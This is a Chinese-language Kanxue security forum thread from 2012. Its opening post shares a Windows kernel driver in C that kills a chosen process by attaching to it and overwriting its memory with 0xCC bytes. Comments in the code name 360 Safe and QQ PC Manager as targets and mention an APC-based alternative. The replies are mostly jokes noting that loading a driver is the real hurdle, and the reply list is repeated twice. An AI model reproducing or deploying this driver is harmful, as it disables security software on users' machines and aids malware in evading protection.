[分享]秒杀360和QQ管家（等）的驱动代码-编程技术-看雪-安全社区|安全招聘|kanxue.com

[分享]秒杀360和QQ管家（等）的驱动代码

发表于: 2012-4-2 09:23 15191

[分享]秒杀360和QQ管家（等）的驱动代码

correy

2012-4-2 09:23

15191

#include "ntddk.h"

typedef struct _KAPC_STATE {
LIST_ENTRY ApcListHead[MaximumMode];
struct _KPROCESS *Process;
BOOLEAN KernelApcInProgress;
BOOLEAN KernelApcPending;
BOOLEAN UserApcPending;
} KAPC_STATE, *PKAPC_STATE, *PRKAPC_STATE;

VOID KeStackAttachProcess(__inout  PRKPROCESS Process,__out PRKAPC_STATE ApcState);
VOID KeUnstackDetachProcess(__in  PRKAPC_STATE ApcState);
NTSTATUS PsLookupProcessByProcessId(__in HANDLE ProcessId,__out  PEPROCESS *Process);

NTSTATUS KillProcessByPID(HANDLE hProcess)
{//通过进程ID号，来结束进程
PEPROCESS m_process;
NTSTATUS    status = STATUS_SUCCESS;
KAPC_STATE m_kapc_state;
ULONG       m_index=0;
PVOID       m_base_address=NULL;

//分配一块只读类型的，大小为0x1000的内存块出来//返回值为分配内存的指针
m_base_address=ExAllocatePoolWithTag(NonPagedPool,0x1000,'Read');
if(m_base_address==NULL) return STATUS_UNSUCCESSFUL;//如果分配内存失败
memset(m_base_address,0xcc,0x1000);  //初始化相关内存，未初始化的变量会被系统赋初值为0xCC

status=PsLookupProcessByProcessId(hProcess,&m_process); //得到指定进程ID的进程环境块
if(!NT_SUCCESS(status)) return status;//返回失败

KeStackAttachProcess (m_process,&m_kapc_state); //附加当前线程到目标进程空间内
for(m_index=0;m_index<0x80000000;m_index+=0x1000)//循环遍历
{
      if(MmIsAddressValid((PVOID)(m_index)))//如果指定内存大小空间能读能写的话
      {
         __try
         { //复制m_base_address内存空间内容到m_index大小的空间
            RtlCopyMemory((PVOID)(m_index),m_base_address,0x1000);
         }
         __except(1)
         {continue;}
      }
      else
      {
         if(m_index>0x1000000) break;
      }
}

KeUnstackDetachProcess(&m_kapc_state);//解除附加
return status;
}

NTSTATUS DriverEntry(PDRIVER_OBJECT  pDriverObject, PUNICODE_STRING  pRegistryPath)
{
KillProcessByPID(XXX);  //填写360Safe.exe的PID。
KillProcessByPID(XXX);  //填写ZhuDongFangYu.exe的PID。
                        //注释：结束360Safe.exe而不结束ZhuDongFangYu.exe，360Safe.exe会死灰复燃。
//ZhuDongFangYu.exe和360Safe.exe都可以用插APC的方法结束（360Safe.exe有点问题）。
//有一种办法，不hook,可以被插APC的办法也杀不掉，就是把线程的链表全部填写为自身的地址。

//QQ 电脑管家的用插APC的办法没有成功，可能用结束线程的函数不够底层。
//要结束QQ管家需要填写4个进程。

//去年年初，不用驱动就能干掉QQ管家，告诉QQ的相关人士，这个办法失灵了。
//今天公布这个办法，是为了推动祖国的安全事业的前进。
//这个办法大多数人都知道，但没有见代码，所以分享。

return 0;
}

[招生]科锐逆向工程师培训(2024年11月15日实地，远程教学同时开班, 第51期)

收藏・10

免费・0

支持

最新回复 (29) 1 2 ▶
ruoko 雪币： 122 活跃值： (72) 能力值： ( LV3，RANK：30 ) 在线值：发帖 35 回帖 226 粉丝 0 关注私信	ruoko 2 楼 2012-4-2 09:53 0
sins破解雪币： 142 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 13 粉丝 0 关注私信	sins破解 3 楼编程没学到家，只能观赏了 2012-4-2 09:56 0
windowsa 雪币： 183 活跃值： (55) 能力值： ( LV3，RANK：20 ) 在线值：发帖 11 回帖 305 粉丝 0 关注私信	windowsa 4 楼楼主的标题很吸引人！！ 2012-4-2 10:13 0
网络游侠雪币： 0 活跃值： (954) 能力值： ( LV3，RANK：30 ) 在线值：发帖 19 回帖 971 粉丝 15 关注私信	网络游侠 5 楼传说中的0大法 2012-4-2 10:14 0
xed 雪币： 129 活跃值： (333) 能力值： ( LV3，RANK：20 ) 在线值：发帖 17 回帖 215 粉丝 2 关注私信	xed 6 楼楼主要是修改成不需要传入PID或者自动获取PID的。就好了 2012-4-2 10:20 0
Mxixihaha 雪币： 4399 活跃值： (4388) 能力值： ( LV2，RANK：10 ) 在线值：发帖 65 回帖 593 粉丝 18 关注私信	Mxixihaha 7 楼 360应该会拦截驱动加载吧? 2012-4-2 10:29 0
天下tianxia 雪币： 137 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 65 粉丝 0 关注私信	天下tianxia 8 楼还是那句话，你都能自如的加载驱动了··· 2012-4-2 10:41 0
HuErr 雪币： 51 活跃值： (15) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 138 粉丝 1 关注私信	HuErr 9 楼楼主确实搞笑。。。你加载驱动的时候就已经被提示了啊。 2012-4-2 10:58 0
tfzxyinhao 雪币： 306 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 7 回帖 180 粉丝 0 关注私信	tfzxyinhao 10 楼注意标题是秒杀,不是秒过,大家不要激动了 2012-4-2 12:09 0
缘份天琊雪币： 50 活跃值： (25) 能力值： ( LV2，RANK：10 ) 在线值：发帖 11 回帖 57 粉丝 0 关注私信	缘份天琊 11 楼不加载驱动神马都是浮云 2012-4-2 12:09 0
ybmc 雪币： 61 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 35 粉丝 0 关注私信	ybmc 12 楼为什么非要带上360和qq管家呢？不就是个驱动结束进程嘛。。。 2012-4-2 12:25 0
莫灰灰雪币： 2331 活跃值： (2225) 能力值： (RANK：400 ) 在线值：发帖 22 回帖 712 粉丝 47 关注私信	莫灰灰 9 13 楼 MJ笑了。 2012-4-2 12:25 0
Fido 雪币： 107 活跃值： (409) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 1019 粉丝 1 关注私信	Fido 14 楼哇..好简单... 2012-4-2 12:33 0
Sysnap 雪币： 581 活跃值： (149) 能力值： ( LV12，RANK：600 ) 在线值：发帖 32 回帖 389 粉丝 10 关注私信	Sysnap 14 15 楼 //去年年初，不用驱动就能干掉QQ管家，告诉QQ的相关人士，这个办法失灵了。 //今天公布这个办法，是为了推动祖国的安全事业的前进。 //这个办法大多数人都知道，但没有见代码，所以分享。是为了推动祖国的安全事业的前进，楼主辛苦了同时对秒杀360和QQ管家（等）其它厂商表示深深的哀悼，你们都干嘛去了。 2012-4-2 12:40 0
亡灵巫师雪币： 202 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 10 粉丝 0 关注私信	亡灵巫师 16 楼数字不会让你加载驱动的! 2012-4-2 13:03 0
thisIs 雪币： 535 活跃值： (245) 能力值： ( LV12，RANK：400 ) 在线值：发帖 16 回帖 73 粉丝 9 关注私信	thisIs 9 17 楼楼主是来搞笑的~ 2012-4-2 13:06 0
小覃雪币： 615 活跃值： (172) 能力值： ( LV9，RANK：140 ) 在线值：发帖 19 回帖 553 粉丝 4 关注私信	小覃 2 18 楼笑而不语。。。。。。同在管态，大家都在底层，你想干哪个进程都没有难度，看就看你能不能进到管态了............ 2012-4-2 13:42 0
chenchuai 雪币： 434 活跃值： (72) 能力值： ( LV2，RANK：10 ) 在线值：发帖 15 回帖 101 粉丝 0 关注私信	chenchuai 19 楼能加载驱动干掉360一点都不费劲啊，方法多呢！关键是怎么去加载驱动，期待楼主的大作！ 2012-4-2 14:33 0
飞心男孩雪币： 300 活跃值： (179) 能力值： ( LV7，RANK：100 ) 在线值：发帖 7 回帖 137 粉丝 1 关注私信	飞心男孩 2 20 楼直接关电源的表示无压力。另外我觉得这个怎么也得让“kanxue”兄弟给LZ个大大的精华！ 2012-4-2 14:46 0
KiDebug 雪币： 544 活跃值： (264) 能力值： ( LV12，RANK：210 ) 在线值：发帖 20 回帖 280 粉丝 6 关注私信	KiDebug 4 21 楼我一口盐汽水喷醒你 2012-4-2 21:59 0
achillis 雪币： 7651 活跃值： (523) 能力值： ( LV9，RANK：610 ) 在线值：发帖 32 回帖 2032 粉丝 47 关注私信	achillis 15 22 楼我是来顶楼上的。。。 2012-4-2 22:03 0
mumaren 雪币： 71 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 48 回帖 659 粉丝 0 关注私信	mumaren 23 楼 MJ笑了 MJ笑了 2012-4-2 22:17 0
liein 雪币： 217 活跃值： (102) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 78 粉丝 0 关注私信	liein 24 楼加载不了驱动一切都是浮云 2012-4-3 08:35 0
mccoysc 雪币： 65 活跃值： (112) 能力值： ( LV3，RANK：30 ) 在线值：发帖 15 回帖 343 粉丝 2 关注私信	mccoysc 25 楼哈哈……老兄，这段时间折腾管家……比毒霸感觉咋样？ 2012-4-3 09:18 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

correy

发帖

133

回帖

385

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号

最新回复 (29) 1 2 ▶
ruoko 雪币： 122 活跃值： (72) 能力值： ( LV3，RANK：30 ) 在线值：发帖 35 回帖 226 粉丝 0 关注私信	ruoko 2 楼 2012-4-2 09:53 0
sins破解雪币： 142 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 13 粉丝 0 关注私信	sins破解 3 楼编程没学到家，只能观赏了 2012-4-2 09:56 0
windowsa 雪币： 183 活跃值： (55) 能力值： ( LV3，RANK：20 ) 在线值：发帖 11 回帖 305 粉丝 0 关注私信	windowsa 4 楼楼主的标题很吸引人！！ 2012-4-2 10:13 0
网络游侠雪币： 0 活跃值： (954) 能力值： ( LV3，RANK：30 ) 在线值：发帖 19 回帖 971 粉丝 15 关注私信	网络游侠 5 楼传说中的0大法 2012-4-2 10:14 0
xed 雪币： 129 活跃值： (333) 能力值： ( LV3，RANK：20 ) 在线值：发帖 17 回帖 215 粉丝 2 关注私信	xed 6 楼楼主要是修改成不需要传入PID或者自动获取PID的。就好了 2012-4-2 10:20 0
Mxixihaha 雪币： 4399 活跃值： (4388) 能力值： ( LV2，RANK：10 ) 在线值：发帖 65 回帖 593 粉丝 18 关注私信	Mxixihaha 7 楼 360应该会拦截驱动加载吧? 2012-4-2 10:29 0
天下tianxia 雪币： 137 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 65 粉丝 0 关注私信	天下tianxia 8 楼还是那句话，你都能自如的加载驱动了··· 2012-4-2 10:41 0
HuErr 雪币： 51 活跃值： (15) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 138 粉丝 1 关注私信	HuErr 9 楼楼主确实搞笑。。。你加载驱动的时候就已经被提示了啊。 2012-4-2 10:58 0
tfzxyinhao 雪币： 306 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 7 回帖 180 粉丝 0 关注私信	tfzxyinhao 10 楼注意标题是秒杀,不是秒过,大家不要激动了 2012-4-2 12:09 0
缘份天琊雪币： 50 活跃值： (25) 能力值： ( LV2，RANK：10 ) 在线值：发帖 11 回帖 57 粉丝 0 关注私信	缘份天琊 11 楼不加载驱动神马都是浮云 2012-4-2 12:09 0
ybmc 雪币： 61 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 35 粉丝 0 关注私信	ybmc 12 楼为什么非要带上360和qq管家呢？不就是个驱动结束进程嘛。。。 2012-4-2 12:25 0
莫灰灰雪币： 2331 活跃值： (2225) 能力值： (RANK：400 ) 在线值：发帖 22 回帖 712 粉丝 47 关注私信	莫灰灰 9 13 楼 MJ笑了。 2012-4-2 12:25 0
Fido 雪币： 107 活跃值： (409) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 1019 粉丝 1 关注私信	Fido 14 楼哇..好简单... 2012-4-2 12:33 0
Sysnap 雪币： 581 活跃值： (149) 能力值： ( LV12，RANK：600 ) 在线值：发帖 32 回帖 389 粉丝 10 关注私信	Sysnap 14 15 楼 //去年年初，不用驱动就能干掉QQ管家，告诉QQ的相关人士，这个办法失灵了。 //今天公布这个办法，是为了推动祖国的安全事业的前进。 //这个办法大多数人都知道，但没有见代码，所以分享。是为了推动祖国的安全事业的前进，楼主辛苦了同时对秒杀360和QQ管家（等）其它厂商表示深深的哀悼，你们都干嘛去了。 2012-4-2 12:40 0
亡灵巫师雪币： 202 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 10 粉丝 0 关注私信	亡灵巫师 16 楼数字不会让你加载驱动的! 2012-4-2 13:03 0
thisIs 雪币： 535 活跃值： (245) 能力值： ( LV12，RANK：400 ) 在线值：发帖 16 回帖 73 粉丝 9 关注私信	thisIs 9 17 楼楼主是来搞笑的~ 2012-4-2 13:06 0
小覃雪币： 615 活跃值： (172) 能力值： ( LV9，RANK：140 ) 在线值：发帖 19 回帖 553 粉丝 4 关注私信	小覃 2 18 楼笑而不语。。。。。。同在管态，大家都在底层，你想干哪个进程都没有难度，看就看你能不能进到管态了............ 2012-4-2 13:42 0
chenchuai 雪币： 434 活跃值： (72) 能力值： ( LV2，RANK：10 ) 在线值：发帖 15 回帖 101 粉丝 0 关注私信	chenchuai 19 楼能加载驱动干掉360一点都不费劲啊，方法多呢！关键是怎么去加载驱动，期待楼主的大作！ 2012-4-2 14:33 0
飞心男孩雪币： 300 活跃值： (179) 能力值： ( LV7，RANK：100 ) 在线值：发帖 7 回帖 137 粉丝 1 关注私信	飞心男孩 2 20 楼直接关电源的表示无压力。另外我觉得这个怎么也得让“kanxue”兄弟给LZ个大大的精华！ 2012-4-2 14:46 0
KiDebug 雪币： 544 活跃值： (264) 能力值： ( LV12，RANK：210 ) 在线值：发帖 20 回帖 280 粉丝 6 关注私信	KiDebug 4 21 楼我一口盐汽水喷醒你 2012-4-2 21:59 0
achillis 雪币： 7651 活跃值： (523) 能力值： ( LV9，RANK：610 ) 在线值：发帖 32 回帖 2032 粉丝 47 关注私信	achillis 15 22 楼我是来顶楼上的。。。 2012-4-2 22:03 0
mumaren 雪币： 71 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 48 回帖 659 粉丝 0 关注私信	mumaren 23 楼 MJ笑了 MJ笑了 2012-4-2 22:17 0
liein 雪币： 217 活跃值： (102) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 78 粉丝 0 关注私信	liein 24 楼加载不了驱动一切都是浮云 2012-4-3 08:35 0
mccoysc 雪币： 65 活跃值： (112) 能力值： ( LV3，RANK：30 ) 在线值：发帖 15 回帖 343 粉丝 2 关注私信	mccoysc 25 楼哈哈……老兄，这段时间折腾管家……比毒霸感觉咋样？ 2012-4-3 09:18 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复